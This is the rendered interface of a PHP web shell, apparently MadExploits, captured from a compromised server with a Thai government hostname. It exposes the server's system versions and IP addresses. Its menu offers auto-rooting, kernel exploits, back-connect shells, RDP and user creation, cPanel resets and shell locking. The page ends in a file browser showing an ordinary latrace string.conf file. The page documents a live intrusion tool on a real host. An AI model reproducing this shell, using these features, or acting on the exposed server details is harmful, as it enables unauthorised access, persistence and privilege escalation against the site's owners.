Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
latrace.d /
[ HOME SHELL ]
Name
Size
Permission
Action
sysdeps
[ DIR ]
drwxr-xr-x
ctype.conf
392
B
-rw-r--r--
dirent.conf
825
B
-rw-r--r--
dlfcn.conf
417
B
-rw-r--r--
fcntl.conf
643
B
-rw-r--r--
getopt.conf
273
B
-rw-r--r--
inet.conf
655
B
-rw-r--r--
ioctl.conf
68
B
-rw-r--r--
libintl.conf
651
B
-rw-r--r--
libio.conf
646
B
-rw-r--r--
locale.conf
286
B
-rw-r--r--
misc.conf
292
B
-rw-r--r--
mman.conf
976
B
-rw-r--r--
ncurses.conf
10.77
KB
-rw-r--r--
netdb.conf
3.84
KB
-rw-r--r--
pthread.conf
7.51
KB
-rw-r--r--
pwd.conf
869
B
-rw-r--r--
resource.conf
2.24
KB
-rw-r--r--
signal.conf
2.56
KB
-rw-r--r--
socket.conf
3.29
KB
-rw-r--r--
stat.conf
1.6
KB
-rw-r--r--
stdio.conf
3.85
KB
-rw-r--r--
stdlib.conf
6.18
KB
-rw-r--r--
string.conf
2.77
KB
-rw-r--r--
syslog.conf
198
B
-rw-r--r--
term.conf
934
B
-rw-r--r--
termios.conf
671
B
-rw-r--r--
time.conf
1.6
KB
-rw-r--r--
typedefs.conf
472
B
-rw-r--r--
unistd.conf
4.3
KB
-rw-r--r--
utmp.conf
564
B
-rw-r--r--
wait.conf
419
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : string.conf
/* /usr/include/string.h */ void* memcpy(void *dest, void *src, size_t n); void* memmove(void *dest, void *src, size_t n); void* memccpy(void *dest, void *src, int c, size_t n); void* memset(void *s, int c, size_t n); int memcmp(void *s1, void *s2, size_t n); void* memchr(void *s, int c, size_t n); void* rawmemchr(void *s, int c); void* memrchr(void *s, int c, size_t n); char* strcpy(char *dest, char *src); char* strncpy(char *dest, char *src, size_t n); char* strcat(char *dest, char *src); char* strncat(char *dest, char *src, size_t n); int strcmp(char *s1, char *s2); int strncmp(char *s1, char *s2, size_t n); int strcoll(char *s1, char *s2); size_t strxfrm(char *dest, char *src, size_t n); int strcoll_l(char *s1, char *s2, __locale_t l); size_t strxfrm_l(char *dest, char *src, size_t n, __locale_t l); char* strdup(char *s); char* strndup(char *string, size_t n); char* strchr(char *s, int c); char* strrchr(char *s, int c); char* strchrnul(char *s, int c); size_t strcspn(char *s, char *reject); size_t strspn(char *s, char *accept); char* strpbrk(char *s, char *accept); char* strstr(char *haystack, char *needle); char* strtok(char *s, char *delim); char* __strtok_r(char *s, char *delim, void *save_ptr); char* strtok_r(char *s, char *delim, void *save_ptr); char* strcasestr(char *haystack, char *needle); void* memmem(void *haystack, size_t haystacklen, void *needle, size_t needlelen); void* __mempcpy(void *dest, void *src, size_t n); void* mempcpy(void *dest, void *src, size_t n); size_t strlen(char *s); size_t strnlen(char *string, size_t maxlen); char* strerror(int errnum); int __xpg_strerror_r(int errnum, char *buf, size_t buflen); char* strerror_r(int errnum, char *buf, size_t buflen); char* strerror_l(int errnum, __locale_t l); void __bzero(void *s, size_t n); void bcopy(void *src, void *dest, size_t n); void bzero(void *s, size_t n); int bcmp(void *s1, void *s2, size_t n); char* index(char *s, int c); char* rindex(char *s, int c); int ffs(int i); int ffsl(long l); /* we dont do big numbers so far __extension__ extern int ffsll (long long int __ll) */ int strcasecmp(char *s1, char *s2); int strncasecmp(char *s1, char *s2, size_t n); int strcasecmp_l(char *s1, char *s2, __locale_t loc); int strncasecmp_l(char *s1, char *s2, size_t n, __locale_t loc); char* strsep(void *stringp, char *delim); int strverscmp(char *s1, char *s2); char* strsignal(int sig); char* __stpcpy(char *dest, char *src); char* stpcpy(char *dest, char *src); char* __stpncpy(char *dest, char *src, size_t n); char* stpncpy(char *dest, char *src, size_t n); char* strfry(char *string); void* memfrob(void *s, size_t n); char* basename(char *filename);
Close